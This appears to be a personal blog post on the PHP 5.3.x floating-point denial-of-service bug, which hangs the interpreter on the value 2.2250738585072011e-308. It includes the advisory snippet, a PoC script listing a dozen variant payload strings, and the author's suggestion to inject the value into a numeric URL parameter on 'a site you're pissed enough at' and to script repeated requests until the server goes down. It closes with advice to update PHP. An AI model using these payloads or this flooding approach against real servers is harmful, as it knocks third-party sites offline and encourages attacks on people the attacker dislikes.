PHP Float DoS <= 5.3.X
I'm not sure if you've heard it or not, it's actually "rather old" news now, but PHP 5.3.X suffers from a floating-point denial of service.
If the PHP interpreter tries to parses a specific number, the fork/thread (?) simply hangs and starts consuming CPU resources.
The original advisory states the following snippet:
[php]<?php $d = '2.2250738585072011e-308'; echo $d; ?>[/php]
The exploit is self explaining, all you have to do is to find a numeric variable on a site you're pissed enough at. Eg:
Replace the id variable with 2.2250738585072011e-308 and watch your success when the server doesn't respond with a page.
This doesn't kill the server - but it do consume alot of CPU resources.
Your best approach is to send several requests (code something will you?) which sends either HTTP POST or GET requests towards the server.
It surely wont take long before it goes down completely.
Yes, it's rather blackhat - but a patch is announced and people will start using this method soon enough anyway. I promise.
According to Exploring Binary the patched was released 2011-01-06 so no harm done!
Here's a PoC script using several variations of the evil floating-point:
[php]
<?php
$boom = array(
'2.2250738585072011e-308',
'.22250738585072011e-307',
'22.250738585072011e-309',
'22250738585072011e-324',
'02.2250738585072011e-308',
'2.22507385850720110e-308',
'2.2250738585072011e-0308',
'2.22507385850720111e-308',
'2.225073858507201123e-308',
'2.22507385850720113099e-308',
'2.225073858507201100001e-308',
'2.2250738585072011123456789012345678901234567890123456789e-308',
);
foreach($boom as $DoS){
echo (float)$DoS;
}
?>
[/php]
That's it! Update your PHP installation (if you haven't already).
More to come!
Ciao Bella!
Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the Co-Founders of Detectify. I'm working closely together with the swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on twitter @Almroot.